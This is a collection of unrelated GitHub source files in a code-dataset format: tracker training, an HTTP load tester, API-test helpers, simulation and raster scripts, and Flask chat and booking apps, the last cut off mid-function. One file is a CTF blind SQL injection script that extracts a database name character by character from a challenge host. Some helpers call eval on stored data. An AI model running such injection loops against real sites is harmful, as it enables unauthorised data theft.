dres, [], args)\n\n # occluded\n elif tracker.state == 3:\n tracker.streak_occluded = tracker.streak_occluded + 1\n\n # find a set of detections for association\n dres = mdp_crop_image_box(dres, dres_image['Igray'][fr - 1], tracker)\n dres, index_det, ctrack = generate_association_index(tracker, fr, dres)\n index_gt = np.where(dres_gt['fr'] == fr)[0]\n if dres_gt['covered'][index_gt] != 0:\n index_det = []\n tracker, _, f = mdp_value(tracker, fr, dres_image, dres, index_det, args)\n\n if not isempty(index_det):\n # compute reward\n reward, label, f, is_end = mdp_reward_occluded(fr, f, dres_image, dres_gt, dres, index_det, tracker,\n args, args.is_text, logger)\n\n # update weights if negative reward\n if reward == -1:\n tracker.f_occluded = np.vstack((tracker.f_occluded, f))\n tracker.l_occluded = np.append(tracker.l_occluded, label)\n # todo what is happening\n if args.is_sk_svm:\n tracker.svc_occluded = tracker.svc_occluded.fit(tracker.f_occluded, tracker.l_occluded)\n else:\n tracker.w_occluded = svm_train(tracker.l_occluded.tolist(), tracker.f_occluded.tolist(),\n '-c 1 -q -g 1 -b 1')\n logger.info('training examples in occluded state {}'.format(tracker.f_occluded.shape[0]))\n if is_end:\n tracker.state = 0\n\n # Transition to inacitve if lost for a long time\n if tracker.streak_occluded > args.max_occlusion:\n tracker.state = 0\n if len(np.where(dres_gt['fr'] == fr)[0]) == 0:\n reward = 1\n logger.info('Target exits due to long time occlusion')\n\n # check if outside image\n if tracker.state == 2:\n _, ov, _ = calc_overlap(tracker.dres, tracker.dres['fr'].shape[0] - 1, dres_image, fr - 1)\n if ov < args.exit_threshold:\n logger.info('Target outside image by checking boarders')\n tracker.state = 0\n reward = 1\n\n # try to connect recently lost target\n if not (tracker.state == 3 and tracker.prev_state == 2):\n fr = fr + 1\n\n if fr > seq_num:\n is_good[t] = 1\n logger.info('sequence {} is good'.format(t))\n counter[t] = counter[t] + 1\n if counter[t] > max_count:\n is_good[t] = 1\n is_difficult[t] = 1\n logger.info('sequence {} mac iteration'.format(t))\n logger.info('Finish training {}'.format(seq_name))\n\n # save model\n if args.is_save:\n # save SVM\n filename = os.path.join(args.output_dir, args.name, seq_name + '_w_active')\n svm_save_model(filename, tracker.w_active)\n filename = os.path.join(args.output_dir, args.name, seq_name + '_w_occluded')\n svm_save_model(filename, tracker.w_occluded)\n w_active = tracker.w_active\n w_occluded = tracker.w_occluded\n tracker.w_active = None\n tracker.w_occluded = None\n\n filename = os.path.join(args.output_dir, args.name, seq_name + '_tracker.pkl')\n logger.info('Saving the tracker at {}'.format(filename))\n with open(filename, 'wb') as f:\n pickle.dump(tracker, f)\n tracker.w_active = w_active\n tracker.w_occluded = w_occluded\n\n return tracker\n\n\n# if __name__ == '__main__':\n# # Parse cmdline args and setup environment\n# parser = argparse.ArgumentParser(\n# 'Appearance Model',\n# formatter_class=argparse.ArgumentDefaultsHelpFormatter\n# )\n# config.add_args(parser)\n# args = parser.parse_args()\n# mdp_train()\n","repo_name":"TapanBhardwaj/MDP_Python","sub_path":"mdp_function/mdp_train.py","file_name":"mdp_train.py","file_ext":"py","file_size_in_byte":8995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9389155077","text":"import asyncio\nimport copy\nimport json\nimport os\nimport statistics\nimport time\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nimport httpx\nimport toml\nimport typer\nfrom httpx._exceptions import ConnectTimeout, HTTPError, NetworkError, ReadTimeout\nfrom jinja2 import Template\nfrom tabulate import tabulate\n\nHTTP_METHODS_FUNC_MAPPING = {\n \"GET\": \"make_get_request\",\n \"POST\": \"make_post_request\",\n \"PUT\": \"make_put_request\",\n \"PATCH\": \"make_patch_request\",\n \"DELETE\": \"make_delete_request\",\n}\n\nSUCCESS = typer.style(\"success\", fg=typer.colors.GREEN, bold=True)\nERROR = typer.style(\"error\", fg=typer.colors.RED, bold=True)\nFLOW_ERROR = typer.style(\"FLOW_ERROR\", bg=typer.colors.RED, fg=typer.colors.WHITE, bold=True)\nREQUEST_INFO = typer.style(\"REQUEST_INFO\", bg=typer.colors.GREEN, fg=typer.colors.BLACK, bold=True)\n\nREQUEST_MESSAGE = \"Request {}: name={}, url={}\"\nSTART_MESSAGE = \"Start bloodaxe, number_of_concurrent_flows={}, duration={} seconds\"\nRESPONSE_DATA_CHECK_FAILED_MESSAGE = \"Failed to check response, request={}, \" \"expected data={}, received={}\"\nRESPONSE_STATUS_CODE_CHECK_FAILED_MESSAGE = (\n \"Status code check failed, request={}, \" \"expected status_code={}, received={}\"\n)\nSECONDS_MASK = \"{0:.2f}\"\nDEFAULT_TIMEOUT = 10\n\nTABLE_HEADERS = [\n \"Total success flows\",\n \"Total error flows\",\n \"Total flows\",\n \"Mean time\",\n \"Standard deviation\",\n \"Total time\",\n]\n\nHTTP_EXCEPTIONS = (HTTPError, NetworkError, ReadTimeout, ConnectTimeout)\n\napp = typer.Typer()\n\n\nclass FlowError(Exception):\n pass\n\n\n@dataclass\nclass Flow:\n duration: float = 0\n error: FlowError = None\n success: bool = True\n\n\ndef show_request_message(status, name, url):\n message = REQUEST_MESSAGE.format(status, name, url)\n typer.echo(message)\n\n\ndef replace_with_template(context, data):\n if isinstance(data, dict):\n data = json.dumps(data)\n\n template = Template(data)\n\n return template.render(**context)\n\n\nasync def make_get_request(url, timeout, params=None, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.get(url, params=params, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_get_request, exc={exc}\")\n\n return resp\n\n\nasync def make_delete_request(url, timeout, params=None, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.delete(url, params=params, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_delete_request, exc={exc}\")\n\n return resp\n\n\nasync def make_put_request(url, data, timeout, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.put(url, json=data, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_put_request, exc={exc}\")\n\n return resp\n\n\nasync def make_patch_request(url, data, timeout, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.patch(url, json=data, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_patch_request, exc={exc}\")\n\n return resp\n\n\nasync def make_post_request(url, data, timeout, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.post(url, json=data, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_post_request, exc={exc}\")\n\n return resp\n\n\ndef check_response_data(request_name, data, expected_data, context):\n expected_data = json.loads(replace_with_template(context, expected_data))\n error_msg = RESPONSE_DATA_CHECK_FAILED_MESSAGE.format(request_name, expected_data, data)\n\n if data != expected_data:\n raise FlowError(error_msg)\n\n\ndef check_response_status_code(request_name, status_code, expected_status_code):\n error_msg = RESPONSE_STATUS_CODE_CHECK_FAILED_MESSAGE.format(\n request_name, expected_status_code, status_code\n )\n\n if status_code != expected_status_code:\n raise FlowError(error_msg)\n\n\ndef check_response(request_name, data, status_code, context, response_check=None):\n if response_check.get(\"data\"):\n check_response_data(request_name, data, response_check[\"data\"], context)\n if response_check.get(\"status_code\"):\n check_response_status_code(request_name, status_code, response_check[\"status_code\"])\n\n\nasync def make_request(context, name, url, method, response_check=None, *args, **kwargs):\n method = method.upper()\n try:\n func = eval(HTTP_METHODS_FUNC_MAPPING[method])\n except KeyError:\n raise FlowError(f\"An error ocurred when make_request, invalid http method={method}\")\n\n resp = await func(url, *args, **kwargs)\n data = resp.json()\n status_code = resp.status_code\n\n if response_check:\n check_response(name, data, status_code, context, response_check)\n\n return data\n\n\ndef show_metrics(flows, total_time):\n success_flows = [flow for flow in flows if flow.success]\n error_flows = [flow for flow in flows if flow.error]\n mean_time = 0\n standard_deviation = 0\n\n if len(success_flows) > 1:\n mean_time = statistics.mean([flow.duration for flow in success_flows])\n standard_deviation = statistics.stdev([flow.duration for flow in success_flows])\n\n row = [\n len(success_flows),\n len(error_flows),\n len(flows),\n SECONDS_MASK.format(round(mean_time, 2)),\n SECONDS_MASK.format(round(standard_deviation, 2)),\n SECONDS_MASK.format(round(total_time, 2)),\n ]\n\n typer.echo(\"\\n\")\n typer.echo(tabulate([row], headers=TABLE_HEADERS))\n\n\ndef from_file(file_path):\n with open(file_path) as f:\n try:\n data = json.load(f)\n except json.JSONDecodeError:\n raise ValueError(f\"Invalid json file, file={file_path}\")\n\n return data\n\n\ndef generate_request_data(context, data):\n if data.get(\"from_file\"):\n data = from_file(data.get(\"from_file\"))\n\n return json.loads(replace_with_template(context, data))\n\n\ndef generate_request_headers(context, headers):\n return json.loads(replace_with_template(context, headers))\n\n\ndef generate_request_params(context, params):\n return json.loads(replace_with_template(context, params))\n\n\ndef make_api_context(api_info):\n context = {}\n for api in api_info:\n context[api[\"name\"]] = {\"base_url\": api[\"base_url\"]}\n\n env_vars = api.get(\"envvars\", {})\n for key, value in env_vars.items():\n context[api[\"name\"]][key] = os.environ[value]\n\n return context\n\n\nasync def run_flow(toml_data, verbose):\n flow_config = copy.deepcopy(toml_data)\n context = make_api_context(flow_config.get(\"api\")) or {}\n start_flow_time = time.time()\n current_flow = Flow()\n\n for request in flow_config[\"request\"]:\n request[\"timeout\"] = request.get(\"timeout\") or DEFAULT_TIMEOUT\n request[\"url\"] = replace_with_template(context, request[\"url\"])\n\n if request.get(\"data\"):\n request[\"data\"] = generate_request_data(context, request[\"data\"])\n\n if request.get(\"params\"):\n request[\"params\"] = generate_request_params(context, request[\"params\"])\n\n if request.get(\"headers\"):\n request[\"headers\"] = generate_request_headers(context, request[\"headers\"])\n\n try:\n result = await make_request(context, **request)\n show_request_message(SUCCESS, request[\"name\"], request[\"url\"])\n if verbose:\n typer.secho(f\"{REQUEST_INFO}: request_name={request['name']}, response={result}\")\n except FlowError as exc:\n show_request_message(ERROR, request[\"name\"], request[\"url\"])\n current_flow.error = exc\n current_flow.success = False\n if verbose:\n typer.secho(f\"{FLOW_ERROR}: {exc}\")\n break\n\n if request.get(\"save_result\"):\n context[request[\"name\"]] = result\n\n current_flow.duration = time.time() - start_flow_time\n\n return current_flow\n\n\nasync def start(toml_data, verbose):\n flows = tuple()\n duration = toml_data[\"configs\"][\"duration\"]\n number_of_concurrent_flows = toml_data[\"configs\"][\"number_of_concurrent_flows\"]\n\n typer.secho(\n START_MESSAGE.format(number_of_concurrent_flows, duration),\n fg=typer.colors.CYAN,\n underline=True,\n bold=True,\n )\n\n start_time = time.time()\n while True:\n elapsed_seconds = time.time() - start_time\n\n if elapsed_seconds >= duration:\n break\n\n results = await asyncio.gather(\n *[run_flow(toml_data, verbose) for _ in range(number_of_concurrent_flows)]\n )\n\n flows += tuple(results)\n\n show_metrics(flows, elapsed_seconds)\n\n\n@app.command()\ndef main(flow_config_file: Path, verbose: bool = False):\n try:\n toml_data = toml.load(flow_config_file)\n except (TypeError, toml.TomlDecodeError):\n typer.echo(\"Invalid toml file\")\n else:\n asyncio.run(start(toml_data, verbose))\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"rfunix/bloodaxe","sub_path":"bloodaxe.py","file_name":"bloodaxe.py","file_ext":"py","file_size_in_byte":9585,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"40613851937","text":"# -*- coding:utf-8 -*-\n\nimport re\nimport random\n\nfrom utils import testcase_handler\n\n\n# @ResponseDependMulti('A-002','industryNo','data')\n# @PayloadDepend('A-001','industryNam')\n\n\ndef ResponseDependMulti(case_no, keyword, dto):\n caseinfo = testcase_handler.get_case_info(case_no=case_no) # 获取当前case_no完整信息\n responsebody = eval(str(caseinfo[13]))\n if '#' not in dto:\n for data in responsebody[dto]:\n return data[str(keyword)]\n elif '#' in dto:\n jsonpath = re.split('#', dto)\n print(jsonpath)\n for i in range(len(jsonpath)):\n print(responsebody)\n if type(responsebody) == list:\n responsebody = responsebody[0][jsonpath[i]]\n else:\n responsebody = responsebody[jsonpath[i]]\n # print(responsebody[str(keyword)])\n # print(responsebody)\n if type(responsebody) == list:\n responsebody = responsebody[0][keyword]\n print(responsebody)\n return responsebody\n else:\n return responsebody[keyword]\n else:\n pass\n\n\ndef PayloadDepend(case_no, keyword):\n caseinfo = testcase_handler.get_case_info(case_no=case_no) # 获取当前case_no完整信息\n requestbody = eval(str(caseinfo[17]))\n return requestbody[keyword]\n\n\n# @RString('u','10')\n# re.search('@(.+?)\\(', str(\"@RString('u','10')\")).group(1)\n# print(re.search('@(.+?)\\(', str(\"@RString('u','10')\")).group(1))\ndef RString(flag, length):\n u_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZ'\n l_str = 'abcdefghigklmnopqrstuvwxyz'\n m_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz'\n if flag == 'u':\n \"\"\"获取指定长度的大写字母\"\"\"\n random_str = ''\n for i in range(int(length)):\n random_str += u_str[random.randint(0, len(u_str) - 1)]\n # print(random_str)\n return random_str\n elif flag == 'l':\n \"\"\"获取指定长度的小写字母\"\"\"\n random_str = ''\n for i in range(int(length)):\n random_str += l_str[random.randint(0, len(l_str) - 1)]\n # print(random_str)\n return random_str\n elif flag == 'm':\n \"\"\"获取指定长度的大小写混合字母\"\"\"\n random_str = ''\n for i in range(int(length)):\n random_str += m_str[random.randint(0, len(m_str) - 1)]\n # print(random_str)\n return random_str\n\n\ndef RNum(length):\n randstart = 10 ** (length - 1)\n randend = (10 ** length) - 1\n return random.randint(randstart, randend)\n\n\ndef test():\n pass\n","repo_name":"Bikankan/ApiAutomatic-1","sub_path":"utils/keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"75132183130","text":"import requests\n\nurl=\"http://ea48910f-376f-4f65-9b03-20a70766520e.node3.buuoj.cn/index.php\"\n# url=\"http://1a80bd91-ddfa-4db6-bd93-198413227815.node3.buuoj.cn/index.php?stunum=if(ascii(substr(database(),1,1))=55,1,2)\"\npayload=\"if(ascii(substr(database(),{},1))={},1,2)\"\n\n# if(ascii(substr(database(),1,1))=54,1,2)\n# if(ascii(substr(select database(),1,1))=55,1,2)\ncharacters=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_\"\nif __name__ == \"__main__\":\n result=\"\"\n for i in range(1,25):\n for ac in range(33,125):\n params={\n \"stunum\":payload.format(i,ac)\n }\n response=requests.get(url=url,params=params)\n # response=requests.get(url=url)\n # print(response.text)\n if(\"Hi admin\" in response.text):\n result+=chr(ac)\n # print(ac)\n print(result)","repo_name":"lurenxiao1998/CTFOJ","sub_path":"[WUSTCTF2020]颜值成绩查询/payload.py","file_name":"payload.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41883448548","text":"from flask import request, jsonify\nfrom chat.api import api_bp\nimport pickle\nimport re\n\n\nclass TextSpamClassifier():\n def __init__(self) -> None:\n with open('notebooks/spam_filter/model_spam.pickle', 'rb') as handle:\n self.model = pickle.load(handle)\n with open('notebooks/spam_filter/vectorizer_spam.pickle',\n 'rb') as handle:\n self.vectorizer = pickle.load(handle)\n\n def __preprocess_text(self, text):\n text = text.lower()\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text)\n text = text.strip()\n text = text.split()\n text = ' '.join(list(filter(lambda x: x not in ['', ' '], text)))\n return text\n\n def predict_proba(self, X):\n val = self.__preprocess_text(X)\n val = self.vectorizer.transform([val])\n prob = self.model.predict_proba(val)[0][1]\n return prob\n\n\nclass TextProfanityClassifier():\n def __init__(self) -> None:\n with open('notebooks/profanity_filter/model_profanity.pickle',\n 'rb') as handle:\n self.model = pickle.load(handle)\n with open('notebooks/profanity_filter/vectorizer_profanity.pickle',\n 'rb') as handle:\n self.vectorizer = pickle.load(handle)\n\n def __preprocess_text(self, text):\n text = text.lower()\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text)\n text = text.strip()\n text = text.split()\n text = ' '.join(list(filter(lambda x: x not in ['', ' '], text)))\n return text\n\n def predict_proba(self, X):\n val = self.__preprocess_text(X)\n val = self.vectorizer.transform([val])\n prob = self.model.predict(val)[0]\n return prob\n\n\n@api_bp.route('/text-validate', methods=['POST'])\ndef text_chat_validate():\n message = request.form.get('message')\n tsc = TextSpamClassifier()\n tpc = TextProfanityClassifier()\n spam_text = \"Not a spam!\"\n prof_text = \"No profane!\"\n if tpc.predict_proba(message) != 0:\n prof_text = \"Highly profane!\"\n if tsc.predict_proba(message) > 0.8:\n spam_text = \"Highly spam!\"\n elif tsc.predict_proba(message) > 0.6:\n spam_text = \"Slightly spam!\"\n elif tsc.predict_proba(message) > 0.4:\n spam_text = \"Less spam!\"\n elif tsc.predict_proba(message) > 0.2:\n spam_text = \"I don't think spam!\"\n\n prof_prob = tpc.predict_proba(message)\n if prof_prob > 0.5:\n prof_text = \"Profane text!\"\n\n return jsonify({\n \"spam_text\": f\"{spam_text}\",\n \"prof_text\": f\"{prof_text}\",\n \"status\": \"success\"\n })\n","repo_name":"indic-amigo-akademi/moraliser","sub_path":"chat/api/chat_route.py","file_name":"chat_route.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4269888887","text":"#!/usr/bin/python\nimport random\ntry:\n from cParameters import *\n from cReadInpLifespan import *\n sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) + \"\\\\.site_packages\\\\riverpy\\\\\")\n import fGlobal as fGl\n import config\n import cThresholdDirector as cT\n import cDefinitions\nexcept:\n print(\"ExceptionERROR: Cannot find package files (/.site_packages/riverpy/).\")\n\ntry:\n import arcpy\nexcept:\n print(\"ExceptionERROR: arcpy is not available (check license connection?)\")\ntry:\n from arcpy.sa import *\nexcept:\n print(\"ExceptionERROR: Spatial Analyst (arcpy.sa) is not available (check license?)\")\n\n\ndef create_bed_shear(self, condition1):\n self.features = cDefinitions.FeatureDefinitions()\n self.feature_reader = cDefinitions.FeatureReader()\n self.thresh_xlsx = config.xlsx_thresholds\n\n try:\n self.wb = oxl.load_workbook(filename=self.thresh_xlsx, read_only=True, data_only=True)\n wb_open = True\n except:\n wb_open = False\n self.logger.info(\"ERROR: Could not open threshold_values.xlsx.\")\n try:\n if wb_open:\n self.ws = self.wb['thresholds']\n else:\n self.ws = \"\"\n except:\n self.logger.info(\"ERROR: Could not find sheet \\'thresholds\\' in threshold_values.xlsx.\")\n\n self.thresh_row_dict = self.feature_reader.get_rows()\n unit_cell = self.ws.cell(row=self.thresh_row_dict['unit'], column=5).value\n\n print(unit_cell)\n __n__ = 0.0473934\n\n if unit_cell == \"U.S. customary\":\n self.ft2m = config.ft2m\n self.ft2in = 12 # (in/ft) conversion factor for U.S. customary units\n self.n = __n__ / 1.49 # (s/ft^(1/3)) global Manning's n where k =1.49 converts to US customary\n self.n_label = \"s/ft^(1/3)\"\n self.rho_w = 1.937 # slug/ft^3\n else:\n self.ft2m = 1.0\n self.ft2in = 1 # (in/ft) dummy conversion factor in SI\n self.n = __n__ # (s/m^(1/3)) global Manning's n\n self.n_label = \"s/m^(1/3)\"\n self.rho_w = 1000 # kg/m^3\n\n self.g = 9.81 / self.ft2m # (ft/s2) gravity acceleration\n self.s = 2.68 # (--) relative grain density (ratio of rho_s and rho_w)\n self.sf = 0.99\n dir_tb = config.dir2conditions + condition1 + \"\\\\tb\\\\\"\n dir_ts = config.dir2conditions + condition1 + \"\\\\ts\\\\\"\n\n os.mkdir(dir_ts)\n os.mkdir(dir_tb)\n\n h = FlowDepth(condition1)\n u = FlowVelocity(condition1)\n grains = GrainSizes(condition1)\n if str(grains.raster).__len__() > 1:\n tx_raster_list = []\n for i in range(0, h.raster_names.__len__()):\n if (str(u.rasters[i]).__len__() > 1) and (str(h.rasters[i]).__len__() > 1):\n _q_ = fGl.read_Q_str(h.raster_names[i], prefix='h')\n _name__ = 'tb' + fGl.write_Q_str(_q_) + '.tif'\n name__ = 'ts' + fGl.write_Q_str(_q_) + '.tif'\n _ras__ = Square(u.rasters[i] / (5.75 * Log10(12.2 * h.rasters[i] / (2 * 2.2 * grains.raster))))\n arcpy.CopyRaster_management(_ras__, dir_tb + _name__)\n __ras__ = (self.rho_w * _ras__) / (self.rho_w * self.g * (self.s - 1) * grains.raster)\n arcpy.CopyRaster_management(__ras__, dir_ts + name__)\n tx_raster_list.append(__ras__)\n\n","repo_name":"RiverArchitect/program","sub_path":"LifespanDesign/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"7808298572","text":"import simPyon as sim\nimport numpy as np\n# To run this file must be in the same folder as \n\ndef main():\n\t# Load up some voltages\n\tvolts = np.load('volts_de_e_1_330_3.npy').item()\n\n\t# Load Simion command environment\n\timap = sim.simion()\n\n\t# mannually input voltages\n\timap.define_volts()\n\n\t# Fast Adjust voltages \n\timap.fast_adjust(elec_dict = volts) # if volts was loaded\n\timap.fast_adjust() #if voltages were input mannually\n\n\t# Define Line distributions for source\n\tline_1 = [np.array([260,156,0]),np.array([270,106,0])]\n\tline_2 = [np.array([99.4,133,0])+10,np.array([158.9,116.8,0])+10]\n\n\t# Print particle source description\n\tprint(imap.parts())\n\n\t# Change distribution type\n\t# imap.parts.pos = sim.particles.source('gaussian')\n\n\t# Change Distribution inputs\n\timap.parts.pos.dist_vals['first'] = line_1[0]\n\timap.parts.pos.dist_vals['last'] = line_1[1]\n\n\t# Fly Particles with souce line_1 and store in data_line_1\n\tdata_line_1 = imap.fly(10000).data\n\n\t# Chance source location to line_2 and fly\n\timap.parts.pos.dist_vals['first'] = line_2[0]\n\timap.parts.pos.dist_vals['last'] = line_2[1]\n\tdata_line_2 = imap.fly(10000).data\n\n\t# Show Simion Geometry and last flown particles\n\timap.show()\n\t# enable measurement mode\n\timap.show(measure = True)\n\n\t# Plot distributions of flow data\n\tdata_line_2.show()\n\tdata_line_1.show()\n\nif __name__ =='__main__':\n\tmain()","repo_name":"jonbowr/simPyon","sub_path":"examples/sim_init.py","file_name":"sim_init.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"72118399451","text":"import datetime as dt\nfrom functools import reduce\n\nimport qrcode\nimport pdfkit\nfrom flask import render_template, redirect, url_for, flash, request\nfrom flask_login import login_required, current_user\n\nfrom . import main\nfrom .tables import ActivityTable, FacilityTable\nfrom .forms import *\nfrom ..models import *\nfrom .. import db\nfrom ..decorators import admin_required, permission_required\nfrom ..email import send_email\n\n\n@main.route('/')\ndef index():\n if current_user.is_administrator():\n return render_template('admin/index.html')\n return render_template('index.html')\n\n\n@main.route('/facility')\ndef facility():\n facilities = Facility.query.all()\n return render_template('facilities.html', facilities=facilities)\n\n\n@main.route('/facility_info/')\ndef view_info(id):\n facility = Facility.query.filter_by(id=id).first()\n return render_template('facility_info.html', facility=facility)\n\n\n@main.route('/membership')\ndef view_membership_type():\n memberships = MembershipType.query.all()\n return render_template('membership.html', memberships=memberships)\n\n\n@main.route('/my_bookings/')\n@login_required\n@permission_required(Permission.DISPLAY)\ndef display_my_bookings(id):\n account = User.query.get_or_404(id)\n bookings = Booking.query.order_by(Booking.timestamp.desc()).filter_by(account_id=account.id).all()\n start_time = []\n end_time = []\n for booking in bookings:\n timetable = TimeManagement.query.filter_by(booking_id=booking.id).get()\n start_time.append(timetable.start_time)\n end_time.append(timetable.end_time)\n return render_template('my_booking.html', bookings=bookings)\n\n\n@main.route('/pricing_list')\ndef display_pricing_list():\n return render_template('pricing_list.html', facilities=Facility.query.all())\n\n\n@main.route('/activities//book', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef book_activity(id):\n form = BookActivityForm(activity=Activity.query.get(id))\n if form.validate_on_submit():\n return render_template('book_activity_instance.html', instance_id=form.activity_instance_id.data)\n return render_template('book_activity.html', form=form)\n\n\n@main.route('/activity-instances//book', methods=['GET', 'POST'])\ndef book_activity_instance(instance_id):\n form = SelectPaymentForm(cards=current_user.cards)\n instance = ActivityInstance.query.get_or_404(instance_id)\n if form.validate_on_submit():\n booking = Booking(activity_instance_id=instance_id,\n status='Paid',\n user_id=current_user.id)\n db.session.add(booking)\n db.session.commit()\n return render_template('booking_success.html', booking=booking)\n return render_template('book_activity_instance.html', form=form, instance=instance)\n\n\n@main.route('/book/', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef book_facility(type):\n if type == 1:\n facility = \"Swimming pool\"\n form = PoolBookingForm()\n elif type == 2:\n facility = \"Fitness room\"\n form = FitnessBookingForm()\n elif type == 3:\n facility = \"Squash courts\"\n form = SquashBookingForm()\n else:\n facility = \"Sports hall\"\n form = HallBookingForm()\n\n if form.validate_on_submit():\n activity = form.activity.data\n number = form.number.data\n date = form.date.data\n start_time = form.start_time.data\n end_time = form.end_time.data\n payment = form.payment.data\n\n fac = Facility.query.filter_by(name=facility).first()\n act = fac.activities.query.filter_by(activity_name=activity).first()\n price = act.activity_price\n\n if end_time - start_time != 1:\n flash('You can only book a 1-hour session')\n return redirect(url_for('.book_facility', type=type))\n\n timetables = TimeManagement.query.filter_by(date=date).all()\n for timetable in timetables:\n if start_time == timetable.start_time:\n id = timetable.id\n\n timetable = TimeManagement.query.filter_by(id=id).get()\n\n if number + timetable.current_capacity > fac.capacity:\n flash('Your have too many people!')\n return redirect(url_for('.book_facility', type=type))\n\n else:\n act.weekly_income = act.weekly_income + price\n act.weekly_usage = act.weekly_usage + number\n db.session.add(act)\n db.session.commit()\n\n booking = Booking(number=number,\n time_id=timetable.id,\n activity=activity,\n status=\"Unpaid\",\n payment=payment,\n fees=price)\n db.session.add(booking)\n db.session.commit()\n\n account = Account.query.filter_by(user_id=current_user.id).first()\n book = Booking.query.order_by(Booking.timestamp.desc()).filter_by(account_id=account.id).first_or_404()\n\n timetable.current_capacity = number + timetable.current_capacity\n db.session.add(timetable)\n db.session.commit()\n\n if payment == \"Credit Card\":\n flash('Pay for your booking.')\n return redirect(url_for('.handle_card_booking'), book_id=book.id)\n elif payment == \"Cash\":\n flash('You will pay for your booking by cash.')\n return redirect(url_for('.index'))\n\n return render_template('book.html', form=form)\n\n\n'''\n@main.route('/book_season', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef book_regular():\n form = RegularBookForm()\n if form.validate_on_submit():\n date = form.date.data\n start_time = form.start_time.data\n end_time = form.end_time.data\n'''\n\n\n@main.route('/handle_card_booking/', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.HANDLE)\ndef handle_card_booking(book_id):\n account = Account.query.filter_by(user_id=current_user.id).first()\n card = CreditCardInfo.query.filter_by(account_id=account.id).first()\n book = Booking.query.filter_by(id=book_id).first()\n form = CardForm()\n\n if form.validate_on_submit():\n card_info = CreditCardInfo(card_number=form.card_number.data,\n expire_month=form.expire_month.data,\n expire_year=form.expire_year.data,\n security_code=form.security_code.data,\n holder_name=form.holder_name.data,\n account_id=id\n )\n if card is not None:\n form.card_number.data = card.card_number\n form.expire_month.data = card.expire_month\n form.expire_year.data = card.expire_year\n form.security_code.data = card.security_code\n form.holder_name.data = card.holder_name\n db.session.add(card_info)\n db.session.commit()\n book.status = \"Paid\"\n db.session.add(book)\n db.session.commit()\n\n receipt = book.activity + '\\n' + book.time.date + '\\n' + book.time.start_time + '~' + book.time.end_time + '\\n'\n pdf_name = str(book.id) + '.pdf'\n pdfkit.from_string(receipt, pdf_name)\n\n qr = qrcode.QRCode(\n version=1,\n error_correction=qrcode.constants.ERROR_CORRECT_L,\n box_size=10,\n border=4,\n )\n\n qr.add_data(\n book.activity + '\\n' + book.time.date + '\\n' + book.time.start_time + '~' + book.time.end_time + '\\n')\n qr.make(fit=True)\n\n img = qr.make_image(fill_color=\"black\", back_color=\"white\")\n\n send_email(current_user.email, 'Your booking receipt',\n 'booking_receipt', book=book, img=img)\n flash('A booking receipt has been sent to you by email.')\n return render_template('handle_card_booking.html', book=book, form=form)\n\n\n@main.route('/bookings//cancel', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CANCEL)\ndef cancel_booking(id):\n booking = Booking.query.get_or_404(id)\n form = SelectPaymentForm(cards=current_user.cards)\n if form.validate_on_submit():\n db.session.delete(booking)\n db.session.commit()\n return redirect(url_for('.display_user_bookings'))\n return render_template('cancel_booking.html', form=form, booking=booking)\n\n\n@main.route('/pay_membership/', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef pay_membership(type_id):\n membership_type = MembershipType.query.query.filter_by(id=type_id).get()\n account = Account.query.filter_by(user_id=current_user.id).first()\n form = PurchaseMembershipForm()\n if form.validate_on_submit():\n membership = Membership(title=form.title.data,\n status=\"Unpaid\",\n firstname=form.firstname.data,\n lastname=form.lastname.data,\n payment=form.payment.data,\n account_id=account.id,\n membership_type_id=membership_type.id\n )\n db.session.add(membership)\n db.session.commit()\n\n if (membership_type.length == 3):\n length = 30\n elif (membership_type.length == 3):\n length = 90\n else:\n length = 365\n 